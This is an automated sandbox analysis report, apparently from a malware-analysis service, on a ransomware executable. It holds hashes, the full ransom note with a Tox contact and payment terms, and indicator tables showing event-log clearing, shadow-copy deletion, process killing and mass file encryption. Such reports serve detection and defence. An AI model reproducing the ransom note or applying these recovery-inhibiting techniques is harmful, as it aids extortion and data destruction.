0b341939797aa4b9ed2f734a16ddc6fb3a4b11fddd98b5ced4e4fc1e54fa2f76

Analysis

max time kernel
25s
max time network
153s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
13/02/2024, 20:46

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
Size

2.2MB
MD5

0608c64c57dcc09246be00f0b2767e6e
SHA1

02642663bfc7be0c06051f4b01c9861102c71850
SHA256

0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985
SHA512

1c61fa21fd94c58349e8c2713828fa807bf44a3a00054cd1a11ab46ec74df4f0be00db245f4cce844b72bf8181e6c636490726ddc4f9d6211469429429ddb138
SSDEEP

24576:Hle0XU/NWp6jCcuYTQn095MmQdg4M/YJFweQDfj0OL2wwU+T8nQl/skT9Fs1g0jv:HiG2ekwA1e7i49vZGqsCz9/47Evz1z1

Score

10^/10

evasion ransomware

Malware Config

Extracted

Path

C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\README_TO_DECRYPT.txt

Ransom Note

Your network has been compromised! All your important data has been encrypted! There is only one way to get your data back to normal: 1. Contact us as soon as possible to avoid damages and losses from your business. 2. Send to us any encrypted file of your choice and your personal key. 3. We will decrypt 1 file for test (maximum file size = 1 MB), its guaranteed that we can decrypt your files. 4. Pay the amount required in order to restore your network back to normal. 5. We will then send you our software to decrypt and will guide you through the whole restoration of your network. We prefer Monero (XMR) - FIXED PRICE We accept Bitcoin (BTC) - 20% extra of total payment! ============================================================================================================================ WARNING! Do not rename encrypted data. Do not try to decrypt using third party software, it may cause permanent data loss not being able to recover. ============================================================================================================================ Contact information: In order to contact us, download with the following software: https://qtox.github.io or https://tox.chat/download.html Then just add us in TOX: D27A7B3711CD1442A8FAC19BB5780FF291101F6286A62AD21E5F7F08BD5F5F1B9803AAC6ECF9 ============================================================================================================================ Your personal id: 5253413d30613733346632663838396530363236373730623638653434363761613734633a363531383665386265356138303035653163646531663839383665653639306536633633383435373966626566366366333136306331653366653033333961323665303531643465613165653864613734666166376637336161636636323933653237393466633835373265313631326665323934343663376433366336353366643162313330616266616533653630616366393830353039333562313230663366656436396464623433303062623137373866313632643432306235633261663137383535386666396333333135646339393030616335643038376363656235383564666138313136353364663630653034616464663066316662323130623536393733313863363135346439353931373062303066633635323236303233653863303831323831643238303039656137353162303231326666646538343330306238666662313837316439313862336463313531356638343362616364613435306533633038353239363733316539383562323666616534663139363064366164666636353936666335653337376430326238633934626461363761386164386332633032636636396331383336326163663661393264393362316233316163643462363565636364313461663936356462383862333061653431326630366139316236336636653862633565363063643432323265356461623134643434366337383038363034373836356366636330396166363931386463663830653265396239353936336139333337653264333037363332643138643536356665623664623538346465613639653239323435313161613363643930633838666531646335653134313535333461636439356334303838373534353862323733383938623134373766316335623630346666616639336337623365373765313666333937313336613837623131366563666665313365323230623633356638313463303338396164373266666166366666646665366233373838306665613430623835656331313661646633386166373061626332356133623333306163336263383734383331363339376162366666373562626133633466656234636162303237363634343033386266303566303264616565383166626435313364346437346364313435366464636232643138616331623062323966643338653330323637393934356130613934316663326233646634316334346336346637643563336165306463346363326335393866336161313935336232613264633961656133623963373330306463613639643262393539353831653965373333353732643936313465616634373635383631333738323632653132613135656162363762373962326465356233623536306330623233363062353765633633303338346239613a33313334666462366436366435623934646634643535316231613839333462633662326631623338666461386635313163646163393039616331633234633465363162303762613635653934346333373637373165343130366261346331613461336232386334303334623538626134316261383964383563386665306436383731646363313735366236326539306536326335336132386639356665366339656339306239366337313135326435663363343230666131386232663037616662383736363734373162343335376233386631666333343331633861656133313333353030636262333562623863353466666563333538633564333764346633316466643464326163666232656430396262303031303564663663626634613132303562363665393237643235383461356538373038636662633033653834366238313033336638346366353432373632373132653437396166333531356462313934616634336238303031386264306332666165333065303231656363333932633763353036366630616664363966353166396330616566643138646365313133303165303663383463373038343566636161643636313034633230633763383939636462646664313331313432316364616239633061633765653536343063616363383332643131663866313834346139623337313561626237616264313434656464623665366335663036306266646662613365383832323439623337333136366338643164613762633238356531653137346232306638386265623734653131343866633532343330323933623364303735663731313466333562343465306339663161373134326566356535366239356339646532393764366231666262396235303539323261643932343066316330383866316637383662633934343030393164626536306664656139373366666562623863356662613133666434393561306638356135363662366533343730663464613165303430623331623336663765666634623765653335343266643034313838656461663038646266313638303739353361333562303233386132366138323837396135373563313638396334386639653662656438616133363733353439623130346435306261303534633839636264303163393361343735303837356434303130303464653035633739633737613266353739383032656434643333306430336166326266666330333063656462386334306462643733326262346662623264636230623432386565373638373634383536306533623532636237303933363031316163306634363262613736656639376666616639376532353035366633636331316536313332346462636439626563653139353934623537643461636438376230383662

URLs

https://qtox.github.io

https://tox.chat/download.html

Signatures

Clears Windows event logs 1 TTPs 6 IoCs

evasion ransomware

Indicator Removal

T1070

pid	Process
3772	wevtutil.exe
3792	wevtutil.exe
3180	wevtutil.exe
3196	wevtutil.exe
3192	wevtutil.exe
3184	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (174) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\ClearMount.eps	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Memo.emf	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\tipresx.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ku.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\micaut.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\tabskb.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\es-ES\wab32res.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\DVD Maker\SecretST.TTF	Process not Found
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipshrv.xml	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\System\ado\es-ES\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\ja-JP\msdaremr.dll.mui	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\ast.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Monet.jpg	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\ShapeCollector.exe.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tipresx.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\mshwLatin.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsplk.xml	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-image-mask.png	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\hi.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spc.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\Microsoft Shared\Triedit\en-US\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\mip.exe.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_MATTE2_PAL.wmv	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Shades of Blue.htm	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\mshwLatin.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipskor.xml	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\ja-JP\msaddsr.dll.mui	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\rtscom.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-dayi.xml	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\sqloledb.rll	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\ado\ja-JP\msader15.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\br.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\va.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkWatson.exe.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\TipBand.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\FlickLearningWizard.exe.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\button-highlight.png	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\lt.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\AddConnect.au	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee90.tlb	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bg.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\TipTsf.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsrus.xml	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\tipresx.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\System\Ole DB\ja-JP\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ka.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Tiki.gif	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\README_TO_DECRYPT.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\InputPersonalization.exe.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\InkWatson.exe.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\mshwLatin.dll.mui	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_kor.xml	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\ba.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe

Interacts with shadow copies 2 TTPs 54 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
3356	vssadmin.exe
1772	vssadmin.exe
3148	vssadmin.exe
3252	vssadmin.exe
3300	vssadmin.exe
3316	vssadmin.exe
3144	vssadmin.exe
3292	vssadmin.exe
3936	vssadmin.exe
3828	vssadmin.exe
3840	vssadmin.exe
3004	vssadmin.exe
3820	vssadmin.exe
3676	vssadmin.exe
1652	vssadmin.exe
3608	vssadmin.exe
3224	vssadmin.exe
3996	vssadmin.exe
1620	vssadmin.exe
3244	vssadmin.exe
3276	vssadmin.exe
3524	vssadmin.exe
4092	vssadmin.exe
3172	vssadmin.exe
3404	vssadmin.exe
4060	vssadmin.exe
3752	vssadmin.exe
3692	vssadmin.exe
3132	vssadmin.exe
3420	vssadmin.exe
3732	vssadmin.exe
1752	vssadmin.exe
3340	vssadmin.exe
3712	vssadmin.exe
2108	vssadmin.exe
3204	vssadmin.exe
3644	vssadmin.exe
3684	vssadmin.exe
3108	vssadmin.exe
3124	vssadmin.exe
3236	vssadmin.exe
3260	vssadmin.exe
3284	vssadmin.exe
3212	vssadmin.exe
3228	vssadmin.exe
3308	vssadmin.exe
3268	vssadmin.exe
3600	vssadmin.exe
3088	vssadmin.exe
2000	vssadmin.exe
3080	vssadmin.exe
3740	vssadmin.exe
3708	vssadmin.exe
3984	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
3916	taskkill.exe
2456	taskkill.exe
3576	taskkill.exe
2020	Process not Found
4424	Process not Found
3972	taskkill.exe
4416	taskkill.exe
1444	taskkill.exe
380	Process not Found
4148	Process not Found
1928	Process not Found
2428	Process not Found
4880	Process not Found
984	Process not Found
1528	Process not Found
3528	Process not Found
4988	Process not Found
760	Process not Found
3256	taskkill.exe
4920	taskkill.exe
3356	taskkill.exe
3864	taskkill.exe
3984	taskkill.exe
3128	Process not Found
1660	Process not Found
4028	taskkill.exe
1116	taskkill.exe
668	Process not Found
1688	Process not Found
3020	Process not Found
380	Process not Found
2116	Process not Found
4704	Process not Found
1632	Process not Found
4136	Process not Found
4064	taskkill.exe
4460	taskkill.exe
4072	taskkill.exe
2292	Process not Found
3808	Process not Found
2104	Process not Found
3156	Process not Found
2580	Process not Found
5068	Process not Found
4880	Process not Found
4416	taskkill.exe
4768	Process not Found
3760	Process not Found
4048	taskkill.exe
1516	Process not Found
3048	taskkill.exe
4512	Process not Found
5060	Process not Found
4516	Process not Found
4944	Process not Found
3840	taskkill.exe
4120	Process not Found
4544	Process not Found
4748	Process not Found
4724	Process not Found
1652	Process not Found
1876	Process not Found
4180	taskkill.exe
576	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
3504	powershell.exe
3504	powershell.exe
3504	powershell.exe
3504	taskkill.exe
3504	taskkill.exe
3504	taskkill.exe
3504	taskkill.exe
2788	powershell.exe
4568	powershell.exe
2568	powershell.exe
3504	Process not Found
3504	Process not Found
3504	Process not Found
4600	powershell.exe
3504	Process not Found
3504	Process not Found
3504	Process not Found
3504	Process not Found
3504	Process not Found
3504	Process not Found
4992	powershell.exe
3708	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeBackupPrivilege	3928	vssvc.exe
Token: SeRestorePrivilege	3928	vssvc.exe
Token: SeAuditPrivilege	3928	vssvc.exe
Token: SeSecurityPrivilege	3772	taskkill.exe
Token: SeSecurityPrivilege	3192	wevtutil.exe
Token: SeBackupPrivilege	3192	wevtutil.exe
Token: SeBackupPrivilege	3772	taskkill.exe
Token: SeSecurityPrivilege	3792	taskkill.exe
Token: SeSecurityPrivilege	3184	wevtutil.exe
Token: SeSecurityPrivilege	3180	taskkill.exe
Token: SeBackupPrivilege	3180	taskkill.exe
Token: SeBackupPrivilege	3792	taskkill.exe
Token: SeBackupPrivilege	3184	wevtutil.exe
Token: SeSecurityPrivilege	3196	taskkill.exe
Token: SeBackupPrivilege	3196	taskkill.exe
Token: SeDebugPrivilege	3944	taskkill.exe
Token: SeDebugPrivilege	3120	taskkill.exe
Token: SeDebugPrivilege	3800	taskkill.exe
Token: SeDebugPrivilege	3952	taskkill.exe
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeDebugPrivilege	3620	taskkill.exe
Token: SeDebugPrivilege	4052	taskkill.exe
Token: SeDebugPrivilege	3960	taskkill.exe
Token: SeDebugPrivilege	3876	taskkill.exe
Token: SeDebugPrivilege	3920	taskkill.exe
Token: SeDebugPrivilege	3612	taskkill.exe
Token: SeDebugPrivilege	3852	taskkill.exe
Token: SeDebugPrivilege	3976	taskkill.exe
Token: SeDebugPrivilege	3160	taskkill.exe
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	4568	powershell.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	4600	powershell.exe
Token: SeDebugPrivilege	5036	taskkill.exe
Token: SeDebugPrivilege	4136	taskkill.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeDebugPrivilege	4364	taskkill.exe
Token: SeDebugPrivilege	3604	taskkill.exe
Token: SeDebugPrivilege	4348	Process not Found
Token: SeDebugPrivilege	4496	taskkill.exe
Token: SeDebugPrivilege	4528	Process not Found
Token: SeDebugPrivilege	2384	Process not Found
Token: SeDebugPrivilege	4724	Process not Found
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	4500	Process not Found
Token: SeDebugPrivilege	2268	Process not Found
Token: SeDebugPrivilege	3700	taskkill.exe
Token: SeDebugPrivilege	4784	Process not Found
Token: SeDebugPrivilege	3200	Process not Found
Token: SeDebugPrivilege	3788	taskkill.exe
Token: SeDebugPrivilege	4392	taskkill.exe
Token: SeDebugPrivilege	1684	Process not Found
Token: SeDebugPrivilege	3672	Process not Found
Token: SeDebugPrivilege	4768	Process not Found
Token: SeDebugPrivilege	3528	Process not Found
Token: SeDebugPrivilege	3660	Process not Found
Token: SeDebugPrivilege	3892	Process not Found
Token: SeDebugPrivilege	4080	taskkill.exe
Token: SeDebugPrivilege	2460	Process not Found
Token: SeDebugPrivilege	4216	Process not Found
Token: SeDebugPrivilege	4300	Process not Found
Token: SeDebugPrivilege	4812	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2240 wrote to memory of 2288	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	97
PID 2240 wrote to memory of 2288	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	97
PID 2240 wrote to memory of 2288	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	97
PID 2240 wrote to memory of 2288	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	97
PID 2240 wrote to memory of 2420	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	94
PID 2240 wrote to memory of 2420	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	94
PID 2240 wrote to memory of 2420	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	94
PID 2240 wrote to memory of 2420	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	94
PID 2240 wrote to memory of 2392	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	95
PID 2240 wrote to memory of 2392	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	95
PID 2240 wrote to memory of 2392	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	95
PID 2240 wrote to memory of 2392	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	95
PID 2240 wrote to memory of 2676	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	96
PID 2240 wrote to memory of 2676	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	96
PID 2240 wrote to memory of 2676	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	96
PID 2240 wrote to memory of 2676	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	96
PID 2240 wrote to memory of 2712	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	93
PID 2240 wrote to memory of 2712	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	93
PID 2240 wrote to memory of 2712	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	93
PID 2240 wrote to memory of 2712	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	93
PID 2240 wrote to memory of 2692	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	92
PID 2240 wrote to memory of 2692	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	92
PID 2240 wrote to memory of 2692	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	92
PID 2240 wrote to memory of 2692	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	92
PID 2240 wrote to memory of 2868	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	91
PID 2240 wrote to memory of 2868	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	91
PID 2240 wrote to memory of 2868	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	91
PID 2240 wrote to memory of 2868	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	91
PID 2240 wrote to memory of 2872	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	90
PID 2240 wrote to memory of 2872	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	90
PID 2240 wrote to memory of 2872	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	90
PID 2240 wrote to memory of 2872	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	90
PID 2240 wrote to memory of 2888	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	89
PID 2240 wrote to memory of 2888	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	89
PID 2240 wrote to memory of 2888	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	89
PID 2240 wrote to memory of 2888	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	89
PID 2240 wrote to memory of 2848	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	88
PID 2240 wrote to memory of 2848	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	88
PID 2240 wrote to memory of 2848	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	88
PID 2240 wrote to memory of 2848	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	88
PID 2240 wrote to memory of 2708	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	87
PID 2240 wrote to memory of 2708	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	87
PID 2240 wrote to memory of 2708	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	87
PID 2240 wrote to memory of 2708	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	87
PID 2240 wrote to memory of 2716	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	86
PID 2240 wrote to memory of 2716	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	86
PID 2240 wrote to memory of 2716	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	86
PID 2240 wrote to memory of 2716	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	86
PID 2240 wrote to memory of 2908	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	85
PID 2240 wrote to memory of 2908	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	85
PID 2240 wrote to memory of 2908	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	85
PID 2240 wrote to memory of 2908	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	85
PID 2240 wrote to memory of 2900	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	79
PID 2240 wrote to memory of 2900	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	79
PID 2240 wrote to memory of 2900	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	79
PID 2240 wrote to memory of 2900	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	79
PID 2240 wrote to memory of 2336	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	80
PID 2240 wrote to memory of 2336	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	80
PID 2240 wrote to memory of 2336	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	80
PID 2240 wrote to memory of 2336	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	80
PID 2240 wrote to memory of 2696	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	78
PID 2240 wrote to memory of 2696	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	78
PID 2240 wrote to memory of 2696	2240	0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe	78
